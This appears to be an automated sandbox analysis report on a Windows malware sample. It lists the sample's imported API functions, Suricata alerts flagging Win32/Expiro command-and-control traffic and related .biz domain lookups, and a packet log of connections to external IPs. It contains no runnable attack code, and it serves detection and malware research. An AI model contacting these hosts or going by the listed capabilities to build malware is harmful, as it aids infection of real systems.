COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T18:55:03.504209+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.5	49705	54.244.188.177	80	TCP
2024-11-22T18:55:03.629635+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.5	49705	TCP
2024-11-22T18:55:03.629635+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.5	49705	TCP
2024-11-22T18:55:11.295030+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49710	132.226.8.169	80	TCP
2024-11-22T18:55:11.476965+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.5	50806	1.1.1.1	53	UDP
2024-11-22T18:55:11.552423+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.5	49711	TCP
2024-11-22T18:55:11.552423+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.5	49711	TCP
2024-11-22T18:55:15.181990+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.5	54833	1.1.1.1	53	UDP
2024-11-22T18:55:18.217849+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.5	49717	TCP
2024-11-22T18:55:18.217849+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	18.141.10.107	80	192.168.2.5	49717	TCP
2024-11-22T18:56:28.107099+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.5	49833	82.112.184.197	80	TCP
2024-11-22T18:56:53.180105+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	47.129.31.212	80	192.168.2.5	49935	TCP
2024-11-22T18:56:53.180105+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	47.129.31.212	80	192.168.2.5	49935	TCP
2024-11-22T18:56:56.026204+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	13.251.16.150	80	192.168.2.5	49942	TCP
2024-11-22T18:56:56.026204+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	13.251.16.150	80	192.168.2.5	49942	TCP
2024-11-22T18:57:06.464922+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	34.246.200.160	80	192.168.2.5	49971	TCP
2024-11-22T18:57:06.464922+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	34.246.200.160	80	192.168.2.5	49971	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 18:55:01.401633024 CET	49704	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:01.521183968 CET	80	49704	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:01.521270990 CET	49704	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:01.965106010 CET	49704	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.007802963 CET	49705	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.128242016 CET	80	49705	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:02.128319025 CET	49705	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.157747030 CET	49705	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.157766104 CET	49705	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.277376890 CET	80	49705	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:02.277400970 CET	80	49705	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:02.730917931 CET	49706	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.850552082 CET	80	49706	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:02.850857019 CET	49706	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.851218939 CET	49706	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.851218939 CET	49706	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:02.970741034 CET	80	49706	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:02.970774889 CET	80	49706	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:03.499643087 CET	80	49705	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:03.499800920 CET	80	49705	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:03.504209042 CET	49705	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:03.510045052 CET	49705	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:03.629635096 CET	80	49705	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:04.300820112 CET	80	49706	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:04.300903082 CET	80	49706	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:04.300962925 CET	49706	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:04.495866060 CET	49706	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:04.545485973 CET	49707	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:04.665116072 CET	80	49707	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:04.665237904 CET	49707	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:04.665410042 CET	49707	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:04.665452003 CET	49707	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:04.784825087 CET	80	49707	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:04.784884930 CET	80	49707	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:05.363271952 CET	49708	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:05.482897043 CET	80	49708	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:05.483000040 CET	49708	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:05.483361959 CET	49708	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:05.483361959 CET	49708	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:05.602832079 CET	80	49708	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:05.602857113 CET	80	49708	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:06.810857058 CET	80	49707	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:06.810870886 CET	80	49707	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:06.810940027 CET	49707	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:06.819839954 CET	49707	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:06.889367104 CET	80	49708	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:06.889518023 CET	80	49708	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:06.889595985 CET	49708	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:06.940294027 CET	80	49707	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:07.576822996 CET	49708	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:07.748923063 CET	49709	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:07.874174118 CET	80	49709	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:07.874718904 CET	49709	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:07.874989986 CET	49709	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:07.875005960 CET	49709	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:07.995066881 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:55:08.000987053 CET	80	49709	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:08.001027107 CET	80	49709	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:08.117593050 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:55:08.117676020 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:55:08.117968082 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:55:08.237411976 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:55:09.302017927 CET	80	49709	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:09.302309990 CET	80	49709	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:09.305367947 CET	49709	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:09.325437069 CET	49709	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:09.444957018 CET	80	49709	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:10.148200989 CET	49711	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:55:10.268903971 CET	80	49711	44.221.84.105	192.168.2.5
Nov 22, 2024 18:55:10.268987894 CET	49711	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:55:10.300566912 CET	49711	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:55:10.300607920 CET	49711	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:55:10.420131922 CET	80	49711	44.221.84.105	192.168.2.5
Nov 22, 2024 18:55:10.420144081 CET	80	49711	44.221.84.105	192.168.2.5
Nov 22, 2024 18:55:10.737875938 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:55:10.747299910 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:55:10.873557091 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:55:11.250415087 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:55:11.295030117 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:55:11.415122032 CET	80	49711	44.221.84.105	192.168.2.5
Nov 22, 2024 18:55:11.415220022 CET	80	49711	44.221.84.105	192.168.2.5
Nov 22, 2024 18:55:11.415273905 CET	49711	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:55:11.432121038 CET	49711	80	192.168.2.5	44.221.84.105
Nov 22, 2024 18:55:11.552423000 CET	80	49711	44.221.84.105	192.168.2.5
Nov 22, 2024 18:55:11.734770060 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:11.734822989 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:11.735198975 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:11.741532087 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:11.741554022 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:12.123461962 CET	49713	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:12.242959023 CET	80	49713	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:12.243058920 CET	49713	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:12.244936943 CET	49713	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:12.245002985 CET	49713	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:12.364705086 CET	80	49713	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:12.364742994 CET	80	49713	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:13.011832952 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:13.011961937 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:13.023066998 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:13.023092031 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:13.023356915 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:13.105104923 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:13.147351980 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:13.459681988 CET	80	49713	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:13.459747076 CET	49713	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:13.476588964 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:13.476650953 CET	443	49712	104.21.67.152	192.168.2.5
Nov 22, 2024 18:55:13.477521896 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:13.483557940 CET	49712	443	192.168.2.5	104.21.67.152
Nov 22, 2024 18:55:13.522862911 CET	49713	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:13.590361118 CET	49714	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:13.642324924 CET	80	49713	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:13.709901094 CET	80	49714	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:13.710356951 CET	49714	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:13.710709095 CET	49714	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:13.711075068 CET	49714	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:13.830173016 CET	80	49714	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:13.830548048 CET	80	49714	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:14.887919903 CET	80	49714	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:14.887993097 CET	49714	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:14.916383028 CET	49714	80	192.168.2.5	172.234.222.143
Nov 22, 2024 18:55:15.036125898 CET	80	49714	172.234.222.143	192.168.2.5
Nov 22, 2024 18:55:15.651679039 CET	49715	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:15.771190882 CET	80	49715	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:15.771284103 CET	49715	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:15.779052019 CET	49715	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:15.779221058 CET	49715	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:15.900314093 CET	80	49715	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:15.900489092 CET	80	49715	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:15.917031050 CET	49717	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:16.036555052 CET	80	49717	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:16.036900997 CET	49717	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:16.047712088 CET	49717	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:16.047730923 CET	49717	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:16.168818951 CET	80	49717	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:16.168859959 CET	80	49717	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:17.183105946 CET	80	49715	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:17.183252096 CET	80	49715	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:17.183654070 CET	49715	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:17.456662893 CET	49715	80	192.168.2.5	54.244.188.177
Nov 22, 2024 18:55:17.576278925 CET	80	49715	54.244.188.177	192.168.2.5
Nov 22, 2024 18:55:17.715266943 CET	49719	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:17.834852934 CET	80	49719	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:17.835021019 CET	49719	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:17.842711926 CET	49719	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:17.842730999 CET	49719	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:17.962272882 CET	80	49719	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:17.962292910 CET	80	49719	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:18.095194101 CET	80	49717	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:18.095468998 CET	80	49717	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:18.095607996 CET	49717	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:18.097882032 CET	49717	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:18.217849016 CET	80	49717	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:19.949023962 CET	80	49719	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:19.949093103 CET	80	49719	18.141.10.107	192.168.2.5
Nov 22, 2024 18:55:19.949167013 CET	49719	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:20.332747936 CET	49727	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:20.452295065 CET	80	49727	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:20.452389002 CET	49727	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:20.453571081 CET	49727	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:20.453596115 CET	49727	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:20.573189020 CET	80	49727	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:20.573199987 CET	80	49727	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:21.008872986 CET	49719	80	192.168.2.5	18.141.10.107
Nov 22, 2024 18:55:42.407888889 CET	80	49727	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:42.408049107 CET	49727	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:42.408049107 CET	49727	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:42.528206110 CET	80	49727	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:42.849489927 CET	49782	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:42.969213009 CET	80	49782	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:42.969364882 CET	49782	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:42.969852924 CET	49782	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:42.970025063 CET	49782	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:55:43.089822054 CET	80	49782	82.112.184.197	192.168.2.5
Nov 22, 2024 18:55:43.089852095 CET	80	49782	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:04.933104038 CET	80	49782	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:04.935286045 CET	49782	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:04.935336113 CET	49782	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:05.056130886 CET	80	49782	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:06.016141891 CET	49833	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:06.135847092 CET	80	49833	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:06.136096954 CET	49833	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:06.142081022 CET	49833	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:06.142081022 CET	49833	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:06.261861086 CET	80	49833	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:06.261921883 CET	80	49833	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:16.250449896 CET	80	49710	132.226.8.169	192.168.2.5
Nov 22, 2024 18:56:16.250523090 CET	49710	80	192.168.2.5	132.226.8.169
Nov 22, 2024 18:56:28.105238914 CET	80	49833	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:28.107099056 CET	49833	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:28.107209921 CET	49833	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:28.187022924 CET	49884	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:28.226869106 CET	80	49833	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:28.310697079 CET	80	49884	82.112.184.197	192.168.2.5
Nov 22, 2024 18:56:28.311278105 CET	49884	80	192.168.2.5	82.112.184.197
Nov 22, 2024 18:56:28.311450958 CET	49884	80	192.168.2.5	82.112.184.197
